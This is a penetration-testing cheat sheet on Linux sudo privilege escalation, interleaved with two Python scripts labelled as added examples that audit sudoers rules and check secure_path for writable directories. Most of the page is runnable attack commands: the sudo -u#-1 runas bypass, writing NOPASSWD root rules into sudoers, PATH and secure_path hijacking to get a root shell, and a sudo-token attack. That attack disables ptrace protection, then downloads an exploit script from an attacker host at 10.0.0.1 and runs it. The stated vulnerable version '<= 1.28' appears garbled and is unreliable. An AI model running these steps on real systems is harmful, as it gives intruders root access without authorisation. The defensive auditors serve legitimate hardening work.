Sudo Privilege Escalation

Sudo commands might be vulnerable to privilege escalation (PrivEsc).


Last updated 1 year ago

GTFOBins

GTFOBins provides a wide variety of payloads for privilege escalation, so it is recommended to look there first.

Investigation

Version

sudo --version

If the sudo version is <= 1.28, try the following command.

sudo -u#-1 /bin/bash

As Another Users

sudo su root
sudo -u john whoami
# -s: run a shell as the target user
sudo -s

List Privileges Commands

We may be able to list the commands we are allowed to run as another user.

sudo -l
sudo -ll

# Specify the hostname
sudo -h <host-name> -l
# Execute via the hostname
sudo -h <host-name> /bin/bash

We might also find the rules in the following files.

cat /etc/sudoers
cat /etc/sudoers.d/usersgroup

If we find the following rule in sudoers,

(ALL, !root) NOPASSWD: /bin/bash

we might be able to get a root shell as follows.

sudo -u#-1 /bin/bash

Edit Sudoers

If we have permission to write /etc/sudoers, we can modify this file.

sudo visudo -f /etc/sudoers

Now add one of the following lines to allow us to execute commands as root. Assume we are logged in as john.

# Unrestricted
john ALL=(ALL:ALL) ALL
# or
john ALL=(root) NOPASSWD: ALL

# Specific command as root
john ALL=(root) NOPASSWD: /usr/bin/passwd

Command Forgery (NOPASSWD)

If you are allowed to execute some command, you can forge the contents of that command. First, check the rule.

sudo -l
(root) NOPASSWD: somecmd

If you can confirm that it can be executed as root without a password, create a command with the same name in any folder you can write files to.

# option 1
echo /bin/sh > /tmp/somecmd

Next, make it executable and add the folder to PATH.

chmod +x /tmp/somecmd
export PATH=/tmp:$PATH

Now execute the command as root.

sudo somecmd
whoami
# root

Command Forgery (SETENV, NOPASSWD)

If you find SETENV: in sudoers, you can set PATH when running the command.

sudo -l
(root) SETENV: NOPASSWD: somecmd

As in the previous section, prepare the payload.

echo '/bin/bash -p' > /tmp/somecmd
chmod +x /tmp/somecmd

Now run the command as root while setting PATH.

sudo PATH=/tmp:$PATH somecmd
whoami
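The checks a defender would run against rules like the ones in the two Command Forgery sections and the `(ALL, !root)` example above, as an added example that is not part of the original page: a small Python auditor that parses user specifications from a sudoers file and flags NOPASSWD, SETENV, a negated Runas list, a command given without an absolute path, and commands whose binary is a shell or interpreter (the GTFOBins class). The sample sudoers content, the rule codes and the severity labels are constructed for this example.

```python
"""Sudoers rule auditor: flags the patterns the sections above show being abused.

Added example, not from the original page. Parses sudoers user specifications
(Defaults, alias and include lines are skipped) and reports NOPASSWD, SETENV,
a negated Runas list such as (ALL, !root), commands given without a full path,
and commands whose binary is a shell or interpreter (the GTFOBins class).
"""
import os
import re

# Lines that are not user specifications and are skipped by the auditor.
SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias",
                 "Cmnd_Alias", "#", "@")

# user  host=(runas) TAG: TAG: commands
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"
    r"(?P<commands>.+)$"
)

# Binaries that trivially give a shell or run arbitrary code when allowed via sudo.
SHELL_LIKE = {"bash", "sh", "dash", "zsh", "python", "python2", "python3",
              "perl", "ruby", "vim", "vi", "less", "more", "find", "awk", "env"}

# Constructed sample sudoers content (not from a real host); the john, alice,
# dave and carol rules mirror the cases discussed on this page.
SAMPLE_SUDOERS = """
Defaults env_reset
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
john    ALL=(ALL, !root) NOPASSWD: /bin/bash
alice   ALL=(root) SETENV: NOPASSWD: /usr/bin/somecmd
dave    ALL=(root) NOPASSWD: somecmd
carol   ALL=(root) /usr/bin/python /home/user/example.py
"""


def audit_rule(line):
    """Return findings for one user-spec line as (code, severity, message) tuples."""
    line = line.strip()
    if not line or line.startswith(SKIP_PREFIXES):
        return []
    m = RULE_RE.match(line)
    if not m:
        return []
    runas = (m.group("runas") or "root").strip()
    tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
    commands = [c.strip() for c in m.group("commands").split(",") if c.strip()]
    findings = []

    if "NOPASSWD" in tags and "ALL" in commands:
        findings.append(("NOPASSWD_ALL", "high",
                         "any command as root with no password: equivalent to a root account"))
    elif "NOPASSWD" in tags:
        findings.append(("NOPASSWD", "medium",
                         "runs without re-authentication; target binaries must be root-owned and non-writable"))
    if "SETENV" in tags:
        findings.append(("SETENV", "high",
                         "caller may override PATH and other variables when invoking the command"))
    if "!" in runas:
        findings.append(("NEGATED_RUNAS", "high",
                         "deny-list Runas such as (ALL, !root); prefer an explicit allow-list of users"))

    for cmd in commands:
        parts = cmd.lstrip("!").split()   # "!cmd" negates a command; audit the binary anyway
        if not parts:
            continue
        exe = parts[0]
        if exe in ("ALL", "sudoedit"):
            continue
        if not exe.startswith("/"):
            findings.append(("RELATIVE_PATH", "high",
                             f"'{exe}' has no absolute path and resolves via the caller's PATH"))
        if os.path.basename(exe) in SHELL_LIKE:
            findings.append(("SHELL_LIKE", "high",
                             f"'{exe}' is a shell or interpreter and can run arbitrary code"))
    return findings


def audit_sudoers(text):
    """Audit every line of a sudoers file; returns (user, line, code, severity, message) rows."""
    rows = []
    for line in text.splitlines():
        for code, severity, message in audit_rule(line):
            rows.append((line.split()[0], line.strip(), code, severity, message))
    return rows


if __name__ == "__main__":
    for user, rule, code, severity, message in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{severity:6}] {user:8} {code:14} {message}\n          rule: {rule}")
```

Run it against the real file with `audit_sudoers(open("/etc/sudoers").read())` (and each file under /etc/sudoers.d) to get the same view of the rules that `sudo -l` gives the attacker; a rule with no findings is not automatically safe, since a password-protected `ALL` is still full root for anyone who learns the password.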

Command Path Hijacking

sudo -l

env_reset
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

(root) python /home/user/example.py

If we can execute some command as root but env_reset and secure_path are set, we cannot override the PATH environment variable. Instead, we need to check whether we have write permission on each directory in secure_path.

ls -al /usr/local/
ls -al /usr/
ls -al /

Assume we can write an arbitrary binary under /usr/sbin; then we can create a payload there. For example, we create a fake python binary under /usr/sbin.

echo /bin/bash > /usr/sbin/python
chmod +x /usr/sbin/python

Then execute the sudo command.

sudo python /home/user/example.py

Now we should get a root shell.
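The defender's counterpart to the `ls -al` checks above, as an added example that is not part of the original page: a Python script that pulls secure_path out of a sudoers file or `sudo -l` output and reports every directory in it that a non-root user could plant a binary in. The `sudo -l` sample is constructed from the listing above; directories are examined with os.stat, and the pure `dir_is_hijackable` helper can also be fed stat fields collected from another host.

```python
"""secure_path writability check for the Command Path Hijacking case above.

Added example, not from the original page. Extracts the secure_path value
from sudoers or from 'sudo -l' output and reports directories that a
non-root user could plausibly plant a binary in.
"""
import os
import stat

# Constructed 'sudo -l' output modelled on the listing shown on this page.
SAMPLE_SUDO_L = """Matching Defaults entries for user on host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User user may run the following commands on host:
    (root) /usr/bin/python /home/user/example.py
"""


def parse_secure_path(text):
    """Return the secure_path directories, or [] if the option is not set.

    Accepts both the sudoers form (Defaults secure_path="a:b") and the
    'sudo -l' form, where the colons are shown escaped as backslash-colon.
    """
    for line in text.splitlines():
        if "secure_path" not in line or "=" not in line:
            continue
        value = line.split("secure_path", 1)[1].strip().lstrip("=").strip()
        value = value.split(",")[0].strip().strip('"')   # drop trailing Defaults options
        return [d for d in value.replace("\\:", ":").split(":") if d]
    return []


def dir_is_hijackable(st_mode, st_uid, st_gid):
    """Pure check on stat() fields: can a non-root principal create or replace
    entries in this directory? True if it is not root-owned, is world-writable,
    or is group-writable by a non-root group."""
    if st_uid != 0:
        return True
    if st_mode & stat.S_IWOTH:
        return True
    if st_mode & stat.S_IWGRP and st_gid != 0:
        return True
    return False


def check_secure_path(dirs):
    """stat() each directory and classify it as 'ok', 'hijackable' or 'missing'.
    A missing directory is still worth noting: whoever can create it decides
    what sudo finds there."""
    result = {}
    for d in dirs:
        try:
            st = os.stat(d)
        except FileNotFoundError:
            result[d] = "missing"
            continue
        hijackable = dir_is_hijackable(st.st_mode, st.st_uid, st.st_gid)
        result[d] = "hijackable" if hijackable else "ok"
    return result


if __name__ == "__main__":
    for path, verdict in check_secure_path(parse_secure_path(SAMPLE_SUDO_L)).items():
        print(f"{verdict:10} {path}")
```

Any "hijackable" entry means env_reset and secure_path are not protecting the rule that follows them: the interpreter named in `(root) python ...` is resolved from those directories, so each of them needs to be root-owned with mode 755 (or stricter), and the script argument itself needs the same treatment.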

Shell in Prompt

#!/bin/bash

read -p "What's your name: "

If we find another user's script like this that can be executed as root, we can input `/bin/bash -i` to get a shell as that user.

Reuse Sudo Tokens

If the current user executes some command using sudo, we might be able to escalate to root privilege. Check that there is no restriction on ptrace.

cat /proc/sys/kernel/yama/ptrace_scope
0

# We can temporarily set it to 0 if we have permissions.
echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope

If the target system does not have a gdb binary, we can download it.

# On the local machine, download the debian package.
wget http://fi.archive.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_9.1-0ubuntu1_amd64.deb -O gdb.deb
python3 -m http.server

# On the remote machine, download the deb package and extract it.
wget http://10.0.0.1:8000/gdb.deb
dpkg -x gdb.deb ~

Next, prepare the exploit script from the repo and execute it.

# On the local machine, download the shell script to exploit.
wget https://github.com/nongiach/sudo_inject/blob/master/exploit.sh
python3 -m http.server

# On the remote machine, download it and execute.
wget http://10.0.0.1:8000/exploit.sh
sh exploit.sh

After that, we can spawn the root shell.

/tmp/activate_sudo_token
sudo su

Reference:

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens